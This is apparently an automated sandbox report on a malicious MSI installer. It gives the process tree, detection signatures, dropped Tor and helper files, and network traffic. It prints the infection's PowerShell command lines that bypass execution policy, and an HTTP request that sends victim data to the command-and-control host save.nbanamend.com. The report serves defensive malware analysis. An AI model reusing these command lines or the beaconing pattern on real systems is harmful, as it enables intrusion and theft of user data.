Windows Analysis Report YwZpT3p5Rh.msi

Overview

General Information

Sample Name: YwZpT3p5Rh.msi
Analysis ID: 527489
MD5: 5bfe975a60a97c93175c935c6d621e04
SHA1: 5bc30f0f540a957d2cc489bbce2c1a7f137069e0
SHA256: 464fe77f576d8273564bb5b7976b381855d962017f4da6b5a363af78bf788799
Tags: Metamorfomsi

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: Suspicious Script Execution From Temp Folder
Wscript starts Powershell (via cmd or directly)
Found Tor onion address
Bypasses PowerShell execution policy
Sigma detected: Change PowerShell Policies to a Unsecure Level
Powershell drops PE file
May use the Tor software to hide its network traffic
Powershell creates an autostart link
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files to the application program directory (C:\ProgramData)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Found dropped PE file which has not been started or loaded
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Creates a start menu entry (Start Menu\Programs\Startup)
PE file contains more sections than normal
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Checks for available system drives (often done to infect USB drives)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 896 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\YwZpT3p5Rh.msi" MD5: 4767B71A318E201188A0D0A420C8B608)
  • msiexec.exe (PID: 3084 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 2496 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 4C63293B3FE9161A1CA264FB932A2300 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
      • powershell.exe (PID: 3492 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue." MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 4188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • wscript.exe (PID: 6980 cmdline: "C:\Windows\System32\WScript.exe" "C:\JQHPQS\ECSGNO.vbs" MD5: 7075DD7B9BE8807FCA93ACD86F724884)
          • MRZANK.exe (PID: 7092 cmdline: "C:\JQHPQS\MRZANK.exe" -f C:\JQHPQS\AZJVGE MD5: 67AB12CF6CABC14588E4F51B21C2134A)
            • conhost.exe (PID: 7108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • powershell.exe (PID: 7156 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -File C:\JQHPQS\QIZABC.ps1 C:\JQHPQS\QRROJT.exe save.nbanamend.com MD5: DBA3E6449E97D4E3DF64527EF7012A10)
            • conhost.exe (PID: 5864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • powershell.exe (PID: 6352 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile MD5: DBA3E6449E97D4E3DF64527EF7012A10)
              • conhost.exe (PID: 3568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • wscript.exe (PID: 6264 cmdline: "C:\Windows\System32\WScript.exe" "C:\JQHPQS\ECSGNO.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • MRZANK.exe (PID: 6308 cmdline: "C:\JQHPQS\MRZANK.exe" -f C:\JQHPQS\AZJVGE MD5: 67AB12CF6CABC14588E4F51B21C2134A)
      • conhost.exe (PID: 5388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5416 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -File C:\JQHPQS\QIZABC.ps1 C:\JQHPQS\QRROJT.exe save.nbanamend.com MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 5508 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 3684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: Process Memory Space: powershell.exe PID: 3492
Rule: PowerShell_Susp_Parameter_Combo
Description: Detects PowerShell invocation with suspicious parameters
Author: Florian Roth
Strings:
  • 0x5f8b3:$sa2: -encodedCommand
  • 0x5f8df:$sa2: -encodedCommand
  • 0x5ffc0:$sa2: -EncodedCommand
  • 0x60ac1:$sa2: -EncodedCommand
  • 0x60b5c:$sa2: -encodedCommand
  • 0xa154:$sc2: -NoProfile
  • 0xa994:$sc2: -NoProfile
  • 0x19800:$sc2: -NoProfile
  • 0x256d1:$sc2: -NoProfile
  • 0x2fa60:$sc2: -NoProfile
  • 0x6aa73:$sc2: -NoProfile
  • 0x71e51:$sc2: -NoProfile
  • 0xa15f:$sd2: -Noninteractive
  • 0xa99f:$sd2: -Noninteractive
  • 0x1980b:$sd2: -Noninteractive
  • 0x256dc:$sd2: -Noninteractive
  • 0x2fa6b:$sd2: -Noninteractive
  • 0x5fddc:$sd2: -NonInteractive
  • 0x6aa7e:$sd2: -Noninteractive
  • 0x71e5c:$sd2: -Noninteractive
  • 0xa16f:$se3: -ExecutionPolicy Bypass

Sigma Overview

System Summary:

Sigma detected: Suspicious Script Execution From Temp Folder
Source: Process started
Author: Florian Roth, Max Altgelt
Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 4C63293B3FE9161A1CA264FB932A2300, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 2496, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue.", ProcessId: 3492
Sigma detected: Change PowerShell Policies to a Unsecure Level
Source: Process started
Author: frack113
Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 4C63293B3FE9161A1CA264FB932A2300, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 2496, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue.", ProcessId: 3492
Sigma detected: Non Interactive PowerShell
Source: Process started
Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 4C63293B3FE9161A1CA264FB932A2300, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 2496, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue.", ProcessId: 3492
Sigma detected: T1086 PowerShell Execution
Source: Pipe created
Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
Data: PipeName: \PSHost.132822036425234276.3492.DefaultAppDomain.powershell

Jbx Signature Overview

Source: MRZANK.exe, 00000012.00000003.437398490.0000000004146000.00000004.00000001.sdmp Binary or memory string: -----BEGIN RSA PUBLIC KEY-----
Source: unknown HTTPS traffic detected: 104.21.91.13:443 -> 192.168.2.5:49770 version: TLS 1.0
Source: Binary string: .textn.pdb `4 source: powershell.exe, 00000017.00000002.546323293.0000000007540000.00000004.00000001.sdmp
Source: C:\Windows\System32\msiexec.exe File opened: z:
Source: C:\Windows\System32\msiexec.exe File opened: x:
Source: C:\Windows\System32\msiexec.exe File opened: v:
Source: C:\Windows\System32\msiexec.exe File opened: t:
Source: C:\Windows\System32\msiexec.exe File opened: r:
Source: C:\Windows\System32\msiexec.exe File opened: p:
Source: C:\Windows\System32\msiexec.exe File opened: n:
Source: C:\Windows\System32\msiexec.exe File opened: l:
Source: C:\Windows\System32\msiexec.exe File opened: j:
Source: C:\Windows\System32\msiexec.exe File opened: h:
Source: C:\Windows\System32\msiexec.exe File opened: f:
Source: C:\Windows\System32\msiexec.exe File opened: b:
Source: C:\Windows\System32\msiexec.exe File opened: y:
Source: C:\Windows\System32\msiexec.exe File opened: w:
Source: C:\Windows\System32\msiexec.exe File opened: u:
Source: C:\Windows\System32\msiexec.exe File opened: s:
Source: C:\Windows\System32\msiexec.exe File opened: q:
Source: C:\Windows\System32\msiexec.exe File opened: o:
Source: C:\Windows\System32\msiexec.exe File opened: m:
Source: C:\Windows\System32\msiexec.exe File opened: k:
Source: C:\Windows\System32\msiexec.exe File opened: i:
Source: C:\Windows\System32\msiexec.exe File opened: g:
Source: C:\Windows\System32\msiexec.exe File opened: e:
Source: C:\JQHPQS\MRZANK.exe File opened: c:
Source: C:\Windows\System32\msiexec.exe File opened: a:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\

Networking:

Found Tor onion address
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpString found in binary or memory: To debug, this may helpWhat was %p doing in pending_entry_connections in %s?Closing one-hop stream to '%s/%s' because the OR conn just failed.entry_conn->socks_requestGiving up on enclave exit '%s' for destination %s.At %s:%d: %p was unexpectedly in circuit_wait. Closing.Application request to port %d: this port is commonly used for unencrypted protocols. Please make sure you don't send anything you would mind the rest of the Internet reading!%sREJECTWARNDANGEROUS_PORT PORT=%d RESULT=%sPort %d listed in RejectPlaintextPorts. Closing.exitoniononion Invalid %shostname %s; rejectingClient asked for %s:%d.exitThe ".exit" notation is disabled in Tor due to security risks.SOCKS_BAD_HOSTNAME HOSTNAME=%sUnable to automap address %sAutomapping %s to %sREVERSE[%s]Missing mapping for virtual address '%s'. Refusing.Onion address %s requested from a port with .onion disabledResolve requests to hidden services not allowed. Failing.Attachstream to a circuit is not supported for .onion addresses currently. Failing.Using previously configured client authorization for hidden service request.Got a hidden service request for ID '%s'addresstype == ONION_V3_HOSTNAMEfailed to parse hs addressNot fetching.Refetching.usableunusableFound %s descriptor in cache for %s. %s.Invalid service name '%s'No descriptor found in our cache for %s. Fetching.Unknown cache lookup error %dedge_conn->rend_dataedge_conn->hs_identDescriptor is here. Great.Stale automapped address for '%s.exit'. Refusing.Address '%s.exit', with impossible source for the .exit part. Refusing.!automapMalformed exit address '%s.exit'. Refusing.Unrecognized relay in exit address '%s.exit'. Refusing.Excluded relay in exit address '%s.exit'. Refusing.Destination '%s' seems to be an invalid hostname. 
Failing.Refusing to connect to non-hidden-service hostname or IP address %s because Port has OnionTrafficOnly set (or NoDNSRequest, NoIPv4Traffic, and NoIPv6Traffic).Refusing to connect to hostname %s because Port has NoDNSRequest set.Refusing to connect to IPv4 address %s because Port has NoIPv4Traffic set.Refusing to connect to IPv6 address %s because Port has NoIPv6Traffic set.Application asked to connect to port 0. Refusing.Rejecting request for anonymous connection to private address %s on a TransPort or NATDPort. Possible loop in your NAT rules?%sRejecting SOCKS request for anonymous connection to private address %s.%sRejecting SOCKS request for an IP address family that this listener does not support.Rejecting SOCKS4 request for an IPv6 address.Rejecting SOCKS4 request on a listener with no IPv4 traffic supported.Redirecting address %s to exit at enclave router %saddresstype == ONION_V2_HOSTNAME || addresstype == ONION_V3_HOSTNAMEWarning! You've just connected to a v2 onion address. These addresses are deprecated for security reasons, and are no longer supported in Tor. Please encourage the site operator to upgrade. For more information see https://blog.torproject.org/v2-deprecation-timelineCalled connection_a
Source: global traffic HTTP traffic detected:
GET /new.php?data=138727%7cuser%7cNo%7c23%2f11%2f2021+21%3a06 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
Host: save.nbanamend.com
Connection: Keep-Alive
Source: global traffic TCP traffic: 192.168.2.5:49775 -> 205.185.127.35:9100
Source: global traffic TCP traffic: 192.168.2.5:49788 -> 213.226.71.164:9001
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown TCP traffic detected without corresponding DNS query: 205.185.127.35
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmp String found in binary or memory: www.google.com,www.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
Source: MRZANK.exe, 00000012.00000002.539834054.00000000032E0000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
Source: MRZANK.exe, 00000012.00000002.539834054.00000000032E0000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.com'~ equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000005.00000002.397291018.00000000029FC000.00000004.00000001.sdmp, powershell.exe, 00000017.00000002.535793950.0000000002BA6000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: MRZANK.exe, 00000012.00000002.547207485.00000000691A2000.00000008.00020000.sdmp String found in binary or memory: http://mingw-w64.sourceforge.net/X
Source: powershell.exe, 00000017.00000002.544386978.0000000005944000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.397646642.0000000004640000.00000004.00000001.sdmp, powershell.exe, 00000017.00000002.535793950.0000000002BA6000.00000004.00000020.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.397419806.0000000004501000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.397646642.0000000004640000.00000004.00000001.sdmp, powershell.exe, 00000017.00000002.535793950.0000000002BA6000.00000004.00000020.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: MRZANK.exe, 00000012.00000002.550461147.000000006B464000.00000008.00020000.sdmp String found in binary or memory: http://www.zlib.net/D
Source: powershell.exe, 00000005.00000003.348135204.00000000074E4000.00000004.00000001.sdmp String found in binary or memory: https://$domain/new.php?data=$dataEnc
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmp String found in binary or memory: https://2019.www.torproject.org/docs/faq.html.en#WarningsAboutSOCKSandDNSInformationLeaks.%s
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmp String found in binary or memory: https://2019.www.torproject.org/docs/faq.html.en#WarningsAboutSOCKSandDNSInformationLeaks.%sDANGEROU
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmp String found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relay
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmp String found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relayCan
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmp String found in binary or memory: https://blog.torproject.org/v2-deprecation-timeline
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmp String found in binary or memory: https://blog.torproject.org/v2-deprecation-timelineCalled
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmp String found in binary or memory: https://bugs.torproject.org/tpo/core/tor/14917.
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmp String found in binary or memory: https://bugs.torproject.org/tpo/core/tor/21155.
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmp String found in binary or memory: https://bugs.torproject.org/tpo/core/tor/8742.
Source: powershell.exe, 00000017.00000002.544386978.0000000005944000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000017.00000002.544386978.0000000005944000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000017.00000002.544386978.0000000005944000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmp String found in binary or memory: https://freehaven.net/anonbib/#hs-attack06
Source: powershell.exe, 00000005.00000002.397646642.0000000004640000.00000004.00000001.sdmp, powershell.exe, 00000017.00000002.535793950.0000000002BA6000.00000004.00000020.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000017.00000002.544386978.0000000005944000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: MRZANK.exe, 00000012.00000002.546580931.0000000069123000.00000008.00020000.sdmp String found in binary or memory: https://www.openssl.org/H
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmp String found in binary or memory: https://www.torproject.org/
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmp String found in binary or memory: https://www.torproject.org/docs/faq.html#BestOSForRelay
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmp String found in binary or memory: https://www.torproject.org/documentation.html
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmp String found in binary or memory: https://www.torproject.org/download/download#warning
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmp String found in binary or memory: https://www.torproject.org/download/download#warningalphabetaThis
Source: unknown DNS traffic detected: queries for: save.nbanamend.com
Source: MRZANK.exe, 00000012.00000002.539363033.000000000110A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -File C:\JQHPQS\QIZABC.ps1 C:\JQHPQS\QRROJT.exe save.nbanamend.com
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -File C:\JQHPQS\QIZABC.ps1 C:\JQHPQS\QRROJT.exe save.nbanamend.com
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\JQHPQS\libssl-1_1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\JQHPQS\libgcc_s_sjlj-1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\JQHPQS\libevent-2-1-7.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\JQHPQS\libssp-0.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\JQHPQS\libevent_extra-2-1-7.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\JQHPQS\libwinpthread-1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\JQHPQS\libcrypto-1_1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\JQHPQS\capturador.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\JQHPQS\libevent_core-2-1-7.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\JQHPQS\tor.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\JQHPQS\QRROJT.exe (copy)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\JQHPQS\zlib1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\JQHPQS\tor-gencert.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\JQHPQS\MRZANK.exe (copy)
Source: Process Memory Space: powershell.exe PID: 3492, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIDE8B.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\3ed8de.msi
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_0776E0F023_2_0776E0F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_0776A79723_2_0776A797
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_0776B50023_2_0776B500
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_0776908023_2_07769080
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_07762C4023_2_07762C40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_07762C3023_2_07762C30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_0776DA6023_2_0776DA60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_07788BE023_2_07788BE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_077A7E8823_2_077A7E88
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: libwinpthread-1.dll.1.drStatic PE information: Number of sections : 18 > 10
Source: libgcc_s_sjlj-1.dll.5.drStatic PE information: Number of sections : 17 > 10
Source: libevent_core-2-1-7.dll.1.drStatic PE information: Number of sections : 17 > 10
Source: libevent_core-2-1-7.dll.5.drStatic PE information: Number of sections : 17 > 10
Source: libssp-0.dll.1.drStatic PE information: Number of sections : 17 > 10
Source: libevent-2-1-7.dll.5.drStatic PE information: Number of sections : 17 > 10
Source: libssp-0.dll.5.drStatic PE information: Number of sections : 17 > 10
Source: libssl-1_1.dll.5.drStatic PE information: Number of sections : 18 > 10
Source: libcrypto-1_1.dll.1.drStatic PE information: Number of sections : 18 > 10
Source: libssl-1_1.dll.1.drStatic PE information: Number of sections : 18 > 10
Source: libcrypto-1_1.dll.5.drStatic PE information: Number of sections : 18 > 10
Source: libgcc_s_sjlj-1.dll.1.drStatic PE information: Number of sections : 17 > 10
Source: libevent_extra-2-1-7.dll.5.drStatic PE information: Number of sections : 17 > 10
Source: libevent-2-1-7.dll.1.drStatic PE information: Number of sections : 17 > 10
Source: libevent_extra-2-1-7.dll.1.drStatic PE information: Number of sections : 17 > 10
Source: libwinpthread-1.dll.5.drStatic PE information: Number of sections : 18 > 10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
